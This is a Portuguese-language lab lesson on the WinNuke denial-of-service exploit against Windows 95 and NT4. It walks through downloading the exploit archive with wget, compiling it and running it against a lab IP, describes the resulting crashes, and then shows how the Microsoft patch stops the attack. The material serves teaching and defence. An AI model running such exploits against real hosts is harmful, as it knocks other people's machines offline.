Aula 01 - Como os hackers

conseguem derrubar a conexao de

um Internauta com Windows 95 e
NT4
INTRODUÇÃO
O exploit winnuke.c explora uma bug existente no sistema de rede do Windows 95 e do NT 4. Basicamente, o
exploit se conecta na porta 139 e envia pacotes com “lixo” para dentro desta porta. Este ataque também é
conhecido como ataque OOB (Out of Bounds) e derruba a conexão TCP/IP da máquina, exigindo que o sistema
operacional seja reiniciado.

Nesta aula usaremos a estacao17 Linux para demonstrar o ataque.

PRÉ-REQUISITOS:
Para compilar o exploit é necessário corrigir os links quebrados do pacote kernel-headers do Conectiva Linux
7.0:

ln –sf /usr/src/linux-2.4.5/include/linux/ /usr/include/linux

ln –sf /usr/src/linux-2.4.5/include/asm /usr/include/asm

Depois obtenha o exploit “winnuke.c” disponível em:

wget http://jeanchristian.com/exploits/winnuke.zip
E prossiga descompactando o pacote:

unzip winnuke.zip
 Protegendo o Windows 95/NT4 contra o ataque da tela azul da morte
Professor JeanChristian.com

Finalmente, compile o exploit:

gcc –o winnuke winnuke.c

Supondo que a máquina alvo seja uma estação Windows 95 com IP 192.168.0.6 verifique se ela está visível na
rede:

ping 192.168.0.6 –c 4
 Protegendo o Windows 95/NT4 contra o ataque da tela azul da morte
Professor JeanChristian.com

Depois, teste o ataque usando o exploit conforme a linha a seguir:

./winnuke 192.168.0.6

CONSEQUÊNCIA DO ATAQUE EM MÁQUINAS COM WINDOWS 95

Após a execução do ataque, estações Windows95 apresentarão a “tela azul da morte”...
 Protegendo o Windows 95/NT4 contra o ataque da tela azul da morte
Professor JeanChristian.com

perdendo a conexão TCP/IP com a rede...

e exigindo que a máquina Windows 95 seja reiniciada para reestabelecer sua conexão TCP/IP com a rede:
 Protegendo o Windows 95/NT4 contra o ataque da tela azul da morte
Professor JeanChristian.com

CONSEQUÊNCIA DO ATAQUE EM MÁQUINAS COM NT 4

Após a execução do ataque, estações NT 4 apresentarão a tela de crash e serão reiniciadas automaticamente:

PROTEGENDO O WINDOWS 95 CONTRA O ATAQUE DO WINNUKE

Para proteger seu sistema Windows 95 do ataque Winuke você deve instalar o patch fornecido pela Microsoft
“Vtcpupd.exe”:

http://support.microsoft.com/default.aspx?
scid=http://download.microsoft.com/download/win95upg/patch1/1/w95/EN-US/vtcpupd.exe
 Protegendo o Windows 95/NT4 contra o ataque da tela azul da morte
Professor JeanChristian.com

Depois do download, execute o programa “Vtcpupd.exe” e clique no botão “Sim” quando aparecer uma caixa
de diálogo avisando que o programa irá atualizar o seu Driver TCP:

Quando a instalação do patch for concluída, aparecerá a caixa de diálogo “Update Complete”:

Então, reinicie o Windows para a atualização fazer efeito:

 Protegendo o Windows 95/NT4 contra o ataque da tela azul da morte
Professor JeanChristian.com

Depois, tente realizar um novo ataque contra a máquina atualizada:

Observe na figura a seguir que o ataque não foi bem sucedido, pois, ainda é possível manter contato com a
máquina alvo:

ping 192.168.0.6
 Protegendo o Windows 95/NT4 contra o ataque da tela azul da morte
Professor JeanChristian.com

Dessa forma, concluímos a demonstração da eficiência do patch vtcpupd.exe para corrigir a vulnerabilidade do
Windows 95 contra o ataque do Winuke.

Para proteger o Windows NT 4 contra o ataque do winnuke, veja a aula “Instalando o último Service Pack no
Windows NT4/2000”